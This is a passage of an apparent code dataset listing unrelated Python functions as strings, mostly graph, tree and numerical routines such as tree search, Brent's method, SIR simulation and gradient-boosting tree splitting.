v_cn_n\n\n if np.linalg.norm(v_sidewalk) < 1e-10:\n v_sidewalk_n = np.array([v_cn_n[1], - v_cn_n[0]])\n else:\n v_sidewalk_n = v_sidewalk / np.linalg.norm(v_sidewalk)\n\n p1 = curr_latlng + street.distance_to_sidewalk * v_sidewalk_n\n p2 = curr_latlng - street.distance_to_sidewalk * v_sidewalk_n\n\n p_sidewalk_1 = Node(None, p1[0], p1[1])\n p_sidewalk_2 = Node(None, p2[0], p2[1])\n\n curr_node.append_sidewalk_node(street.id, p_sidewalk_1)\n curr_node.append_sidewalk_node(street.id, p_sidewalk_2)\n\n # Figure out on which side you want to put each sidewalk node\n v_c1 = curr_node.vector_to(p_sidewalk_1)\n if np.cross(v_cn_n, v_c1) > 0:\n 
return p_sidewalk_1, p_sidewalk_2\n else:\n return p_sidewalk_2, p_sidewalk_1", "def RegenerateWith2Nodes (failed_node, list_of_nodes, name):\n \n list_of_vects = []\n\n for node_index in list_of_nodes:\n list_of_vects = list_of_vects + (map(lambda x: list(x), list(conf.BASIS_VECTORS [node_index])))\n\n array_A = numpy.array(list_of_vects).transpose()\n arrays_B = []\n\n arrays_B = map(lambda x: list(x), list(conf.BASIS_VECTORS [failed_node]))\n\n obj_list = []\n\n for node_index in list_of_nodes:\n for object_index in range(0,conf.PART_SIZE):\n obj_list.append (dist.pull_object_from_stores (name, node_index, object_index))\n\n for each in arrays_B:\n parts_to_pull = numpy.linalg.solve (array_A, numpy.array(each).transpose())\n pack = []\n \n for i in range(0,len(parts_to_pull)):\n if (parts_to_pull[i] != 0):\n pack.append (copy.deepcopy (obj_list[i]))\n\n dist.push_object_to_store (name, failed_node, reduce (numpy.bitwise_xor, pack), arrays_B.index (each))", "def prepare_data_for_g(self):\n\n paths = []\n for i in self.root_nodes:\n if np.random.rand() < config.update_ratio:\n sample, paths_from_i = self.sample(i, self.trees[i], config.n_sample_gen, for_d=False)\n if paths_from_i is not None:\n paths.extend(paths_from_i)\n # for each root, we generate 20 samples, each sample is equal to one path from root to that sample\n # So, we will get maximum (num_root x 20) paths\n # path is a list with length = (N x num_sample), with num_sample = 20\n # paths =[[path_root1_to_sample1],[path_root1_to_sample2],....,[path_root1_to_sample20],\n # [path_root2_to_sample1],[path_root2_to_sample2],....,[path_root2_to sample20]\n # .\n # .\n # [path_rootN_to_sample1],[path_rootN_to_sample2],....,[path_rootN_to_sample20]]\n # get_node_pairs_from_path\n\n node_pairs = list(map(self.get_node_pairs_from_path, paths))\n # node_pairs = [[node pairs for path_root1_to_sample1],[node pairs for path_root1_to_sample2],....,[node pairs for path_root1_to_sample20],\n # [node_pairs for path_root2_to_sample1],[node pairs for path_root2_to_sample2],....,[node pairs for path_root2_to sample20],\n # .\n # .\n # [node pairs for path_rootN_to_sample1],[node pairs for path_rootN_to_sample2],....,[node pairs for path_rootN_to_sample20]]\n\n node_1 = []\n node_2 = []\n for i in range(len(node_pairs)):\n for pair in node_pairs[i]:\n node_1.append(pair[0])\n node_2.append(pair[1])\n # reward = self.sess.run(self.discriminator.reward,\n # feed_dict={self.discriminator.node_id: np.array(node_1),\n # self.discriminator.node_neighbor_id: np.array(node_2)})\n reward = self.discriminator.forward(node_1, node_2)\n return node_1, node_2, reward", "def update_tree(root, executed_acts, total_rew):\n root.value = max(total_rew, root.value)\n root.visits += 1\n new_nodes = 0\n\n node = root\n for step, act in enumerate(executed_acts):\n if act not in node.children:\n node.children[act] = Node()\n new_nodes += 1\n node = node.children[act]\n node.value = max(total_rew, node.value)\n node.visits += 1\n\n return new_nodes", "def newton(backward_differences, max_num_iters, newton_coefficient, ode_fn_vec,\n order, step_size, time, tol, unitary, upper):\n initial_guess = tf.reduce_sum(\n tf1.where(\n tf.range(MAX_ORDER + 1) <= order,\n backward_differences[:MAX_ORDER + 1],\n tf.zeros_like(backward_differences)[:MAX_ORDER + 1]),\n axis=0)\n\n np_dtype = np_dtype = dtype_util.as_numpy_dtype(backward_differences.dtype)\n\n rhs_constant_term = newton_coefficient * tf.reduce_sum(\n tf1.where(\n tf.range(1, MAX_ORDER + 1) <= order,\n RECIPROCAL_SUMS[1:, 
np.newaxis].astype(np_dtype) *\n backward_differences[1:MAX_ORDER + 1],\n tf.zeros_like(backward_differences)[1:MAX_ORDER + 1]),\n axis=0)\n\n next_time = time + step_size\n step_size_cast = tf.cast(step_size, backward_differences.dtype)\n real_dtype = tf.abs(backward_differences).dtype\n\n def newton_body(iterand):\n \"\"\"Performs one iteration of Newton's method.\"\"\"\n next_backward_difference = iterand.next_backward_difference\n next_state_vec = iterand.next_state_vec\n\n rhs = newton_coefficient * step_size_cast * ode_fn_vec(\n next_time,\n next_state_vec) - rhs_constant_term - next_backward_difference\n delta = tf.squeeze(\n tf.linalg.triangular_solve(\n upper,\n tf.matmul(tf.transpose(unitary), rhs[:, tf.newaxis]),\n lower=False))\n num_iters = iterand.num_iters + 1\n\n next_backward_difference += delta\n next_state_vec += delta\n\n delta_norm = tf.cast(tf.norm(delta), real_dtype)\n lipschitz_const = delta_norm / iterand.prev_delta_norm\n\n # Stop if method has converged.\n approx_dist_to_sol = lipschitz_const / (1. - lipschitz_const) * delta_norm\n close_to_sol = approx_dist_to_sol < tol\n delta_norm_is_zero = tf.equal(delta_norm, tf.constant(0., dtype=real_dtype))\n converged = close_to_sol | delta_norm_is_zero\n finished = converged\n\n # Stop if any of the following conditions are met:\n # (A) We have hit the maximum number of iterations.\n # (B) The method is converging too slowly.\n # (C) The method is not expected to converge.\n too_slow = lipschitz_const > 1.\n finished = finished | too_slow\n if max_num_iters is not None:\n too_many_iters = tf.equal(num_iters, max_num_iters)\n num_iters_left = max_num_iters - num_iters\n num_iters_left_cast = tf.cast(num_iters_left, real_dtype)\n wont_converge = (\n approx_dist_to_sol * lipschitz_const**num_iters_left_cast > tol)\n finished = finished | too_many_iters | wont_converge\n\n return [\n _NewtonIterand(\n converged=converged,\n finished=finished,\n next_backward_difference=next_backward_difference,\n next_state_vec=next_state_vec,\n num_iters=num_iters,\n prev_delta_norm=delta_norm)\n ]\n\n iterand = _NewtonIterand(\n converged=False,\n finished=False,\n next_backward_difference=tf.zeros_like(initial_guess),\n next_state_vec=tf.identity(initial_guess),\n num_iters=0,\n prev_delta_norm=tf.constant(np.array(-0.), dtype=real_dtype))\n [iterand] = tf.while_loop(lambda iterand: tf.logical_not(iterand.finished),\n newton_body, [iterand])\n return (iterand.converged, iterand.next_backward_difference,\n iterand.next_state_vec, iterand.num_iters)", "def recursion_loop(pulls, discount, grid_n):\n\n r_grid = np.linspace(0, 1, grid_n)\n gittins, values = initial_approximation(pulls, discount, grid_n)\n n = pulls - 2 # Note that the 2 comes from (1) the initial approximation and (2) python indexing\n while n >= 1:\n g, v = recursion_step(values[:n + 1, n, :], r_grid, discount)\n values[:n, n - 1] = v\n gittins[:n, n - 1] = g\n n -= 1\n return gittins, values", "def update_nodes(self, weights=None, hive_instance=None):\n hive = hive_instance or shared_hive_instance()\n metadata = None\n account = None\n cnt = 0\n while metadata is None and cnt < 5:\n cnt += 1\n try:\n account = Account(\"fullnodeupdate\", hive_instance=hive)\n metadata = json.loads(account[\"json_metadata\"])\n except:\n hive.rpc.next()\n account = None\n metadata = None\n if metadata is None:\n return\n report = metadata[\"report\"]\n failing_nodes = metadata[\"failing_nodes\"]\n parameter = metadata[\"parameter\"]\n benchmarks = parameter[\"benchmarks\"]\n if weights is 
None:\n weights_dict = {}\n for benchmark in benchmarks:\n weights_dict[benchmark] = (1. / len(benchmarks))\n elif isinstance(weights, list):\n weights_dict = {}\n i = 0\n weight_sum = 0\n for w in weights:\n weight_sum += w\n for benchmark in benchmarks:\n if i < len(weights):\n weights_dict[benchmark] = weights[i] / weight_sum\n else:\n weights_dict[benchmark] = 0.\n i += 1\n elif isinstance(weights, dict):\n weights_dict = {}\n i = 0\n weight_sum = 0\n for w in weights:\n weight_sum += weights[w]\n for benchmark in benchmarks:\n if benchmark in weights:\n weights_dict[benchmark] = weights[benchmark] / weight_sum\n else:\n weights_dict[benchmark] = 0.\n\n max_score = len(report) + 1\n new_nodes = []\n for node in self:\n new_node = node.copy()\n for report_node in report:\n if node[\"url\"] == report_node[\"node\"]:\n new_node[\"version\"] = report_node[\"version\"]\n scores = []\n for benchmark in benchmarks:\n result = report_node[benchmark]\n rank = result[\"rank\"]\n if not result[\"ok\"]:\n rank = max_score + 1\n score = (max_score - rank) / (max_score - 1) * 100\n weighted_score = score * weights_dict[benchmark]\n scores.append(weighted_score)\n sum_score = 0\n for score in scores:\n sum_score += score\n new_node[\"score\"] = sum_score\n for node_failing in failing_nodes:\n if node[\"url\"] == node_failing:\n new_node[\"score\"] = -1\n new_nodes.append(new_node)\n super(NodeList, self).__init__(new_nodes)", "def solve(self):\n self.left -= len(self.nodes)\n \n def depths(x,depth = 0):\n depth+=1\n for y in self.graph[x]:\n if y in self.nodes:\n self.nodes.remove(y)\n depth = depths(y,depth)\n return depth\n \n while len(self.nodes):\n x = self.nodes.pop()\n self.firstGen.append(depths(x))\n #print self.graph\n #print self.nodes\n #print self.firstGen", "def generate_children_nodes(\n curr_node, list_of_processed_nodes,\n running_count_of_children_dups, a_star_search=False\n):\n children_nodes_to_return = []\n direction_coordinates_map = curr_node.state.get_legal_snake_movement_coords()\n \n for direction, legal_coords in direction_coordinates_map.iteritems():\n curr_state_copy = copy.deepcopy(curr_node.state)\n new_state = State(\n dim=curr_state_copy.dim, num_obstacles=curr_state_copy.num_obstacles,\n grid=curr_state_copy.grid, snake=curr_state_copy.snake\n )\n #pdb.set_trace()#\n new_state.update_state_after_movement(new_head_coords=legal_coords)\n\n new_node_state = new_state\n new_node_action = direction\n new_node_parent_index = curr_node.index\n new_node_depth = curr_node.depth + 1\n\n new_node = Node(\n state=new_node_state, action=new_node_action,\n parent_index=new_node_parent_index, depth=new_node_depth\n )\n\n if not a_star_search:\n if new_node in list_of_processed_nodes:\n running_count_of_children_dups += 1\n continue\n\n children_nodes_to_return.append(new_node)\n\n return children_nodes_to_return, running_count_of_children_dups", "def find_nodes(input_line: str) -> List[Node]:\n li = [int(elem) for elem in input_line.split(\" \")]\n assert len(li) >= 2\n \n # store Nodes in two sets, depending is their processing ready or not\n unfinished = set()\n finished = set()\n \n \n i = 0 # points to the index where to read the input list\n parent = None\n \n # add root node\n global root # global so we can directly grab its value outside this func\n root = Node(num_childs = li[i], num_metadata = li[i+1], children = None, parent = parent)\n print(\"Added root node:\", root)\n \n # Logic for handling the root node\n if root.num_childs > 0:\n unfinished.add(root) # assumes more 
to come...\n i += 2 # continue from child's first element\n else: # root node does not have children\n finished.add(root)\n i += 2 + root.num_metadata\n \n parent = root\n \n \n all_done = False # set to True when all nodes have been processed (to break out of the loop)\n \n # now we have a root ready\n while i < len(li):\n #print(i)\n \n while parent.num_child_processed >= parent.num_childs:\n # backtrack a step towards root node!\n # store metadata elements\n parent.metadata = li[i: i+parent.num_metadata]\n \n # calculate node value\n parent.value = sum(parent.children[idx - 1].value for idx in parent.metadata if idx > 0 and idx <= parent.num_childs)\n \n finished.add(parent)\n unfinished.remove(parent)\n i += parent.num_metadata\n \n if parent.parent:\n parent = parent.parent\n else: # was root\n print(\"Backtracking out from root, hence all done\")\n all_done = True\n break\n \n if all_done:\n break\n \n curr_num_childs, curr_num_metadata = li[i], li[i+1]\n \n # create a new node\n curr_node = Node(num_childs = curr_num_childs, num_metadata = curr_num_metadata, children = None, parent = parent)\n #print(\"Found new node:\", curr_num_childs, curr_num_metadata, \"\\t\\tparent:\", parent)\n parent.children.append(curr_node)\n parent.num_child_processed += 1\n \n if curr_num_childs > 0: # current node has children\n unfinished.add(curr_node)\n i = i + 2 # continue with the child\n parent = curr_node # which has current node as its parent\n else: # current node is a leaf node\n curr_node.metadata = li[i+2: i+2+curr_num_metadata]\n # calculate node value\n curr_node.value = sum(curr_node.metadata)\n \n finished.add(curr_node)\n i = i + 2 + curr_num_metadata\n \n return finished", "def getNextNodeUsingCellDiff(kGoalState):\n \n global fringe\n global solutions\n\n \n\n\n\n minNode = None\n minCost = 99999999999\n minNodeIndex = -1\n\n \n pnode = None\n pcost = None\n\n if len(solutions)>0 and solutions[0] != None:\n pnode = solutions[0];\n pcost = getHValueForNode(pnode,kGoalState)\n #print pnode, pcost\n # raw_input()\n \n\n\n\n for idx,node in enumerate(fringe):\n #get the heu. function values\n g_value = getHValueForNode(node,kGoalState)\n \n\n if g_value < minCost:\n minNode = node\n minNodeIndex = idx\n minCost = g_value\n\n\n fringe.pop(minNodeIndex)\n c = getHValueForNode(minNode,kGoalState)\n if pnode != None:\n if c > pcost:\n minNode = None\n \n return minNode", "def _compute_nodes_1d(npts, ilbds1d): # pylint: disable=line-too-long\n if npts % 2 == 0:\n raise ValueError(\"Please enter odd npts\")\n ind = np.arange(1, npts + 1)\n nodes = 0.5 * (1 - np.cos(np.pi * ind / (npts + 1)))\n return nodes * (ilbds1d[1] - ilbds1d[0]) + ilbds1d[0]", "def calculate(self, extraParams=None):\n\n if not self.isCalc or self.nodeClass == \"button\" or self.nodeClass == \"formnode\":\n nodeIsCircular = self.isCircular()\n if not self._bypassCircularEvaluator and nodeIsCircular:\n circularNodes = self.getSortedCyclicDependencies()\n\n if self.dynamicEvaluator is None:\n self.dynamicEvaluator = FactoryDynamic.createInstance(\n circularNodes, self)\n\n params = self.dynamicEvaluator.generateCircularParameters(\n self, circularNodes)\n\n if params['dynamicIndex'] is None:\n raise ValueError(\"Cyclic dependency detected between nodes: \" + \",\".join(\n circularNodes) + \". Please use the 'pp.dynamic' function\")\n elif 'indexDic' in params and len(params['indexDic']) > 1:\n raise ValueError(\n f'Multiple indices were found using dynamic. Indexes: {\",\".join(params[\"indexDic\"].keys())}. 
Nodes involved: {\",\".join(circularNodes)}')\n\n self.dynamicEvaluator.circularEval(self, params)\n else:\n from_circular_evaluator = self._bypassCircularEvaluator\n\n self.sendStartCalcNode(from_circular_evaluator)\n self.model.currentProcessingNode(self.identifier)\n self._bypassCircularEvaluator = False\n\n startTime = dt.datetime.now()\n finalDef = str(self._definition)\n self.lastLazyTime = 0\n\n # CLEAR circular dependency\n if nodeIsCircular:\n finalDef = BaseDynamic.clearAllCircularDependency(finalDef)\n tmpCode = self.compileDef(finalDef)\n\n # check for replace calls to varaibles with next rules:\n # node1 --> change to getNode('node1').result\n # node1.result --> change to getNode('node1').result\n # node1.title --> change to getNode('node1').title\n # \"node1\" --> no change\n # 'node1' --> no change\n if not tmpCode is None:\n names = self.parseNames(tmpCode)\n rx = r\"('[^'\\\\]*(?:\\\\.[^'\\\\]*)*'|\\\"[^\\\"\\\\]*(?:\\\\.[^\\\"\\\\]*)*\\\")|\\b{0}\\b\"\n for node in names:\n if self._model.existNode(self._model.clearId(node)):\n finalDef = re.sub(rx.format(node), lambda m:\n (\n m.group(1)\n if m.group(1)\n else\n (\n \"getNode('\"+node+\"')\"\n if (m.endpos > m.regs[0][1]+5) and ((m.string[m.regs[0][1]:m.regs[0][1]+5] == '.node') or (m.string[m.regs[0][1]:m.regs[0][1]+8] == '.timeit('))\n else\n (node\n if (m.string[m.regs[0][0]-1:m.regs[0][0]+len(node)] == ('.'+node)) or (m.string[m.regs[0][0]-7:m.regs[0][0]] == 'import ') or (m.string[m.regs[0][0]-5:m.regs[0][0]] == 'from ')\n else \"getCalcNode('\"+node+\"')\"\n )\n )\n ), finalDef, 0, re.IGNORECASE)\n elif node == \"self\":\n finalDef = re.sub(rx.format(node), lambda m:\n (\n m.group(1)\n if m.group(1)\n else\n \"getNode('\" + self.identifier + \"')\"\n if (m.endpos > m.regs[0][1]+11) and (m.string[m.regs[0][1]:m.regs[0][1]+11] != '._tryFilter')\n else \"self\"\n ), finalDef, 0, re.IGNORECASE)\n\n localRes = {\n \"getNode\": self._model.getNode,\n \"getCalcNode\": self._getCalcNode,\n \"cp\": Helpers(self)\n }\n if not extraParams is None:\n for keyParam in extraParams:\n localRes[keyParam] = extraParams[keyParam]\n\n customImports = self.model.getCustomImports()\n if customImports:\n for keyParam in customImports:\n localRes[keyParam] = customImports[keyParam]\n\n try:\n # execute node definition in supervised context\n memoryIO = io.StringIO()\n try:\n with redirect_stdout(memoryIO):\n exec(compile(finalDef, '<string>', 'exec'), localRes)\n except Exception as ex:\n if \"_io.StringIO\" in str(ex):\n exec(compile(finalDef, '<string>', 'exec'), localRes)\n else:\n raise ex\n\n self.lastEvaluationConsole = memoryIO.getvalue()\n memoryIO = None\n\n if self.nodeClass not in [\"button\", \"module\", \"text\"]:\n if 'this' in localRes:\n self._result = localRes['this']\n elif 'result' in localRes:\n self._result = localRes['result']\n else:\n self._result = None\n if self.lastEvaluationConsole != \"\":\n self._result = str(self.lastEvaluationConsole)\n else:\n raise ValueError(\n \"The result was not found. 
Did you forget to include the text 'result =' ?\")\n\n self._isCalc = self.nodeClass != \"button\"\n self.postCalculate()\n\n endTime = dt.datetime.now()\n self.lastEvaluationTime = (\n endTime - startTime).total_seconds() - self.lastLazyTime\n if self.lastEvaluationTime < 0:\n self.lastEvaluationTime = 0\n self.evaluationVersion = self.model.evaluationVersion\n finally:\n localRes[\"cp\"].release()\n localRes = None\n self.sendEndCalcNode(from_circular_evaluator)\n else:\n self._bypassCircularEvaluator = False", "def start_one_step(self):\r\n new_infected_list = []\r\n old_infected_list = copy.deepcopy(self.infected_list)\r\n new_recovered_list = []\r\n old_recovered_list = copy.deepcopy(self.recovered_list)\r\n # For each infected node\r\n for infected_nid in old_infected_list:\r\n infected_node = self.node_dict[infected_nid]\r\n # For each neighbor\r\n for dst_nid in infected_node.get_dst_nid_list(self.graph):\r\n dst_node = self.node_dict[dst_nid]\r\n # Infect susceptible nodes with probability [p]\r\n if dst_node.state is NodeState.SUSCEPTIBLE and random.random() < self.p:\r\n dst_node.infected(self.i)\r\n new_infected_list.append(dst_nid)\r\n\r\n # Minus 1 turn of (remaining) infected days for all infected nodes\r\n infected_node.minus_one_state_day()\r\n # If infected node is recovered\r\n if infected_node.check_finish_infection():\r\n # Infected node get recovered\r\n infected_node.recovered(self.r)\r\n # Remove from infected list\r\n self.infected_list.remove(infected_nid)\r\n # Append to recovered list\r\n new_recovered_list.append(infected_nid)\r\n\r\n # Add newly infected nodes into infected list\r\n self.infected_list += new_infected_list\r\n\r\n # For each recovered node\r\n for recovered_nid in old_recovered_list:\r\n recovered_node = self.node_dict[recovered_nid]\r\n # Minus 1 turn of (remaining) recovered days for all recovered nodes\r\n recovered_node.minus_one_state_day()\r\n # If infected node is recovered\r\n if recovered_node.check_finish_recovery():\r\n # Recovered node get recovered\r\n recovered_node.susceptible()\r\n # Remove from recovered list\r\n self.recovered_list.remove(recovered_nid)\r\n\r\n # Add newly recovered nodes into recovered list\r\n self.recovered_list += new_recovered_list", "def split_next(self):\n # Consider the node with the highest loss reduction (a.k.a. 
gain)\n node = heappop(self.splittable_nodes)\n\n tic = time()\n (sample_indices_left,\n sample_indices_right,\n right_child_pos) = self.splitter.split_indices(node.split_info,\n node.sample_indices)\n self.total_apply_split_time += time() - tic\n\n depth = node.depth + 1\n n_leaf_nodes = len(self.finalized_leaves) + len(self.splittable_nodes)\n n_leaf_nodes += 2\n\n left_child_node = TreeNode(depth,\n sample_indices_left,\n node.split_info.sum_gradient_left,\n node.split_info.sum_hessian_left,\n parent=node)\n right_child_node = TreeNode(depth,\n sample_indices_right,\n node.split_info.sum_gradient_right,\n node.split_info.sum_hessian_right,\n parent=node)\n left_child_node.sibling = right_child_node\n right_child_node.sibling = left_child_node\n node.right_child = right_child_node\n node.left_child = left_child_node\n\n # set start and stop indices\n left_child_node.partition_start = node.partition_start\n left_child_node.partition_stop = node.partition_start + right_child_pos\n right_child_node.partition_start = left_child_node.partition_stop\n right_child_node.partition_stop = node.partition_stop\n\n self.n_nodes += 2\n\n if self.max_depth is not None and depth == self.max_depth:\n self._finalize_leaf(left_child_node)\n self._finalize_leaf(right_child_node)\n return left_child_node, right_child_node\n\n if (self.max_leaf_nodes is not None\n and n_leaf_nodes == self.max_leaf_nodes):\n self._finalize_leaf(left_child_node)\n self._finalize_leaf(right_child_node)\n self._finalize_splittable_nodes()\n return left_child_node, right_child_node\n\n if left_child_node.n_samples < self.min_samples_leaf * 2:\n self._finalize_leaf(left_child_node)\n if right_child_node.n_samples < self.min_samples_leaf * 2:\n self._finalize_leaf(right_child_node)\n\n # Compute histograms of childs, and compute their best possible split\n # (if needed)\n should_split_left = left_child_node.value is None # node isn't a leaf\n should_split_right = right_child_node.value is None\n if should_split_left or should_split_right:\n\n # We will compute the histograms of both nodes even if one of them\n # is a leaf, since computing the second histogram is very cheap\n # (using histogram subtraction).\n n_samples_left = left_child_node.sample_indices.shape[0]\n n_samples_right = right_child_node.sample_indices.shape[0]\n if n_samples_left < n_samples_right:\n smallest_child = left_child_node\n largest_child = right_child_node\n else:\n smallest_child = right_child_node\n largest_child = left_child_node\n\n # We use the brute O(n_samples) method on the child that has the\n # smallest number of samples, and the subtraction trick O(n_bins)\n # on the other one.\n tic = time()\n smallest_child.histograms = \\\n self.histogram_builder.compute_histograms_brute(\n smallest_child.sample_indices)\n largest_child.histograms = \\\n self.histogram_builder.compute_histograms_subtraction(\n node.histograms, smallest_child.histograms)\n self.total_compute_hist_time += time() - tic\n\n tic = time()\n if should_split_left:\n self._compute_best_split_and_push(left_child_node)\n if should_split_right:\n self._compute_best_split_and_push(right_child_node)\n self.total_find_split_time += time() - tic\n\n return left_child_node, right_child_node", "def update_nodes(nodes, svg_h):\n for i in range(0, len(nodes)):\n nodes[i,2] = svg_h-nodes[i,2]\n return nodes", "def _buildtree(self):\n self.pricetree = np.zeros((self.steps+1,self.steps+1))\n self.pricetree[0][0] = self.p\n for j in range(self.steps):\n for i in range(j+1):\n self.pricetree[j+1][i+1] 
= self.pricetree[j][i]*self.down\n self.pricetree[j+1][0] = self.pricetree[j][0]*self.up", "def run_one_step(self, dt):\n if not self._erode_flooded_nodes:\n flood_status = self._grid.at_node[\"flood_status_code\"]\n flooded_nodes = np.nonzero(flood_status == _FLOODED)[0]\n else:\n flooded_nodes = []\n\n upstream_order_IDs = self._grid[\"node\"][\"flow__upstream_node_order\"]\n\n defined_flow_receivers = np.not_equal(\n self._grid[\"node\"][\"flow__link_to_receiver_node\"], self._grid.BAD_INDEX\n )\n\n try:\n length_of_link = self._grid.length_of_d8\n except AttributeError:\n length_of_link = self._grid.length_of_link\n\n flow_link_lengths = length_of_link[\n self._grid.at_node[\"flow__link_to_receiver_node\"][defined_flow_receivers]\n ]\n flow_receivers = self._grid[\"node\"][\"flow__receiver_node\"]\n\n # Operate the main function:\n if self._use_W:\n self._alpha[defined_flow_receivers] = (\n self._K[defined_flow_receivers]\n * dt\n * self._A[defined_flow_receivers] ** self._m\n / self._W[defined_flow_receivers]\n / (flow_link_lengths**self._n)\n )\n\n else:\n self._alpha[defined_flow_receivers] = (\n self._K[defined_flow_receivers]\n * dt\n * self._A[defined_flow_receivers] ** self._m\n / (flow_link_lengths**self._n)\n )\n\n # Handle flooded nodes, if any (no erosion there)\n if flooded_nodes is not None:\n self._alpha[flooded_nodes] = 0.0\n\n reversed_flow = self._elevs < self._elevs[flow_receivers]\n # this check necessary if flow has been routed across\n # depressions\n self._alpha[reversed_flow] = 0.0\n\n threshdt = self._sp_crit * dt\n\n # solve using Brent's Method in Cython for Speed\n if isinstance(threshdt, float):\n brent_method_erode_fixed_threshold(\n upstream_order_IDs,\n flow_receivers,\n threshdt,\n self._alpha,\n self._n,\n self._elevs,\n )\n else:\n brent_method_erode_variable_threshold(\n upstream_order_IDs,\n flow_receivers,\n threshdt,\n self._alpha,\n self._n,\n self._elevs,\n )", "def brents(f, x0, x1, max_iter=50, tolerance=1e-5):\n \n fx0 = f(x0)\n fx1 = f(x1)\n \n assert (fx0 * fx1) <= 0, \"Root not bracketed\" \n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n fx0, fx1 = fx1, fx0\n \n x2, fx2 = x0, fx0\n \n d = np.nan\n mflag = True\n steps_taken = 0\n \n while steps_taken < max_iter and abs(x1-x0) > tolerance:\n fx0 = f(x0)\n fx1 = f(x1)\n fx2 = f(x2)\n \n if fx0 != fx2 and fx1 != fx2:\n L0 = (x0 * fx1 * fx2) / ((fx0 - fx1) * (fx0 - fx2))\n L1 = (x1 * fx0 * fx2) / ((fx1 - fx0) * (fx1 - fx2))\n L2 = (x2 * fx1 * fx0) / ((fx2 - fx0) * (fx2 - fx1))\n new = L0 + L1 + L2\n \n else:\n new = x1 - ( (fx1 * (x1 - x0)) / (fx1 - fx0) )\n \n tt1 = (new < ((3 * x0 + x1) / 4) or new > x1)\n tt2 = (mflag == True and (abs(new - x1)) >= (abs(x1 - x2) / 2))\n tt3 = (mflag == False and (abs(new - x1)) >= (abs(x2 - d) / 2))\n tt4 = (mflag == True and (abs(x1 - x2)) < tolerance)\n tt5 = (mflag == False and (abs(x2 - d)) < tolerance)\n if (tt1 or\n tt2 or\n tt3 or\n tt4 or\n tt5):\n new = (x0 + x1) / 2\n mflag = True\n \n else:\n mflag = False\n \n fnew = f(new)\n d, x2 = x2, x1\n \n if (fx0 * fnew) < 0:\n x1 = new\n else:\n x0 = new\n \n if abs(fx0) < abs(fx1):\n x0, x1 = x1, x0\n \n steps_taken += 1\n \n return x1, steps_taken", "def make_euler_circuit(start_node, updated_graph_instance):\n\n current_edges_on_graph_list = make_edges_list(updated_graph_instance.edges_dict)\n\n current_node = start_node\n\n node_visit_order = [current_node]\n edge_visit_order = []\n\n # print(\"\\n\\n\\ncurrent_edges_on_graph_list:\", current_edges_on_graph_list)\n\n while 
len(current_edges_on_graph_list) > 0:\n\n # print(\"current_edges_on_graph_list:\", current_edges_on_graph_list)\n # while there are still edges on the graph, keep traversing\n\n current_bridges_on_graph = get_bridges(current_edges_on_graph_list)\n\n edges_conn_to_current_node = get_all_conn_edges_remaining_in_graph(\n current_node, current_edges_on_graph_list, updated_graph_instance.nodes_dict\n )\n\n edge_to_traverse = choose_edge_to_traverse(\n current_node, edges_conn_to_current_node, current_bridges_on_graph\n )\n\n if edge_to_traverse in current_edges_on_graph_list:\n\n current_edges_on_graph_list.remove(edge_to_traverse)\n\n else:\n\n current_edges_on_graph_list.remove(edge_to_traverse[::-1])\n\n edge_to_traverse_list = list(edge_to_traverse)\n # remove current node from edge to traverse\n edge_to_traverse_list.remove(current_node)\n # update current node to be the only node left in the edge list\n\n # update edge traveral list with edge just traversed\n edge_traversed = (current_node, edge_to_traverse_list[0])\n\n edge_visit_order.append(edge_traversed)\n\n current_node = edge_to_traverse_list[0]\n\n # add the new current node to the nodes visit order list\n node_visit_order.append(current_node)\n\n # add node visit order and edge_visit order to graph instance\n\n updated_graph_instance.node_visit_order = node_visit_order\n\n updated_graph_instance.edge_visit_order = edge_visit_order\n\n updated_graph_instance.node_geojson = make_node_geojson(updated_graph_instance)\n\n updated_graph_instance.edge_geojson = make_edge_geojson(updated_graph_instance)\n\n updated_graph_instance.route_geojson = make_route_geojson(updated_graph_instance)\n\n print(\"\\n\\n\\n\\n\\nROUTE COLLECTION\", updated_graph_instance.route_geojson)\n\n print(\"check done\")\n\n return updated_graph_instance", "def compare_nodes(G,all_match_pairs,match_pair,traversed,node1,node2, ports_weight):\n logger.debug(f\"comparing {node1},{node2}, traversed {traversed}\")\n nbrs1 = sorted(set(G.neighbors(node1)) - set(traversed))\n #remove dummies\n nbrs1 = sorted(set([nbr for nbr in nbrs1 if G.get_edge_data(node1, nbr)['weight'] !=7]))\n nbrs2 = sorted(set(G.neighbors(node2)) - set(traversed))\n #remove dummies\n nbrs2 = sorted(set([nbr for nbr in nbrs2 if G.get_edge_data(node2, nbr)['weight'] !=7]))\n logger.debug(f\"node1:{node1},property: {G.nodes[node1]},neigbors1: {nbrs1}\")\n logger.debug(f\"node2:{node2},property: {G.nodes[node2]},neigbors2: {nbrs2}\")\n if not nbrs1 or not nbrs2:\n if compare_two_nodes(G, node1, node2, ports_weight):\n match_pair[node1] = node2\n logger.debug(f\"no new neihbours, returning recursion {match_pair}\")\n return\n elif len(nbrs1)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n logger.debug(f\"skipping high fanout nets due to large computation, {node1} {nbrs1}\")\n traversed.append(node1)\n return\n elif len(nbrs2)> 10:\n if \"start_point\" in match_pair.keys():\n match_pair[\"start_point\"]+=[node1,node2]\n else:\n match_pair[\"start_point\"]=[node1,node2]\n traversed.append(node2)\n logger.debug(f\"skipping high fanout nets due to large computation, {node2} {nbrs2}\")\n return\n\n if node1 == node2:\n if node1 in match_pair.keys() or node1 in match_pair.values():\n logger.debug(\"avoid existing pair wise symmetry\")\n return\n logger.debug(f\"single node {node1}, nbrs {nbrs1}, nbr_weight {[G.get_edge_data(node1,nbr) for nbr in nbrs1]}\")\n SD_nbrs= [nbr for nbr in nbrs1 if 
